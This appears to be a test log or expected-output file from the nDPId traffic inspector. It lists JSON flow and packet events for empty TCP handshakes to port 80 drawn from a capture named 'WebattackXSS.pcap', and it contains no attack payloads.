-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":3,"flow_last_seen":1499347748473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347748473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W1tAAD4Gan2sEAABwKgKMuxmAFDolLkx+LaZQoAQAOVDCgAAAQEICgE74msD5bPf"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6527,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347749751,"flow_last_seen":1499347749751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347749751,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6527,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1499347749751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347749751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IJFAAD4GpT+sEAABwKgKMux0AFD35MM7AAAAAKACchDSOAAAAgQFtAQCCAoBO+OqAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6528,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":2,"flow_last_seen":1499347749752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347749752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7HSHR7QM9+TDPKAScSDevgAAAgQFtAQCCAoD5bUfATvjqgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":3,"flow_last_seen":1499347749752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347749752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IJJAAD4GpUasEAABwKgKMux0AFD35MM8h0e0DYAQAOV9xgAAAQEICgE746oD5bUf"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347625094,"flow_last_seen":1499347630791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347625094,"flow_last_seen":1499347630791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347626349,"flow_last_seen":1499347631791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347626349,"flow_last_seen":1499347631791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347627616,"flow_last_seen":1499347632792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347627616,"flow_last_seen":1499347632792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347630130,"flow_last_seen":1499347635793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347630130,"flow_last_seen":1499347635793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347631388,"flow_last_seen":1499347636793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347631388,"flow_last_seen":1499347636793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347632635,"flow_last_seen":1499347637795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347632635,"flow_last_seen":1499347637795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347752308,"flow_last_seen":1499347752308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347752308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1499347752308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347752308,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qStAAD4GHKWsEAABwKgKMuyOAFBMoE8CAAAAAKACchDvHQAAAgQFtAQCCAoBO+YpAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":2,"flow_last_seen":1499347752308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347752308,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7I5f6lZGTKBPA6AScSB+SAAAAgQFtAQCCAoD5beeATvmKQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6547,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":3,"flow_last_seen":1499347752309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347752309,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qSxAAD4GHKysEAABwKgKMuyOAFBMoE8DX+pWR4AQAOUdTwAAAQEICgE75ioD5bee"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347753649,"flow_last_seen":1499347753649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347753649,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1499347753649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347753649,"pkt":"ABm5CmnxAMGxFOsxCABFAAA825ZAAD4G6jmsEAABwKgKMuycAFCJVjzvAAAAAKACchDDHAAAAgQFtAQCCAoBO+d5AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":2,"flow_last_seen":1499347753649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347753649,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Jyb\/4pAiVY88KAScSDg6AAAAgQFtAQCCAoD5bjtATvneQEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6559,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":3,"flow_last_seen":1499347753650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347753650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA025dAAD4G6kCsEAABwKgKMuycAFCJVjzwm\/+KQYAQAOV\/8AAAAQEICgE753kD5bjt"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347756244,"flow_last_seen":1499347756244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347756244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1499347756244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347756244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sh5AAD4GE7KsEAABwKgKMuy2AFCIyFgfAAAAAKACchCl2AAAAgQFtAQCCAoBO+oBAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":2,"flow_last_seen":1499347756244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347756244,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Lb17AxJiMhYIKAScSDlJQAAAgQFtAQCCAoD5bt2ATvqAQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6580,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":3,"flow_last_seen":1499347756245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347756245,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sh9AAD4GE7msEAABwKgKMuy2AFCIyFgg9ewMSoAQAOWELAAAAQEICgE76gID5bt2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347757502,"flow_last_seen":1499347757502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347757502,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1499347757502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347757502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UWhAAD4GdGisEAABwKgKMuzEAFA\/lLpUAAAAAKACchCLjgAAAgQFtAQCCAoBO+s8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6588,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":2,"flow_last_seen":1499347757502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347757502,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7MQtkPNXP5S6VaAScSCq7wAAAgQFtAQCCAoD5bywATvrPAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6589,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":3,"flow_last_seen":1499347757502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347757502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UWlAAD4GdG+sEAABwKgKMuzEAFA\/lLpVLZDzWIAQAOVJ9wAAAQEICgE76zwD5byw"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347758774,"flow_last_seen":1499347758774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347758774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1499347758774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347758774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83kZAAD4G54msEAABwKgKMuzSAFAZPzI8AAAAAKACchA4sAAAAgQFtAQCCAoBO+x6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6600,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":2,"flow_last_seen":1499347758774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347758774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7NL2+p6BGT8yPaAScSDiPQAAAgQFtAQCCAoD5b3vATvsegEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6601,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":3,"flow_last_seen":1499347758775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347758775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03kdAAD4G55CsEAABwKgKMuzSAFAZPzI99vqegoAQAOWBRQAAAQEICgE77HoD5b3v"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6617,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347761418,"flow_last_seen":1499347761418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761418,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6617,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1499347761418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347761418,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8apdAAD4GWzmsEAABwKgKMuzsAFC\/aIWYAAAAAKACchA8ewAAAgQFtAQCCAoBO+8PAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":2,"flow_last_seen":1499347761418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347761418,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7OwFUgVYv2iFmaAScSBuRgAAAgQFtAQCCAoD5cCEATvvDwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6619,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":3,"flow_last_seen":1499347761419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347761419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aphAAD4GW0CsEAABwKgKMuzsAFC\/aIWZBVIFWYAQAOUNTgAAAQEICgE77w8D5cCE"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347635154,"flow_last_seen":1499347640794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347635154,"flow_last_seen":1499347640794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347636429,"flow_last_seen":1499347641793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347636429,"flow_last_seen":1499347641793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347637687,"flow_last_seen":1499347642795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 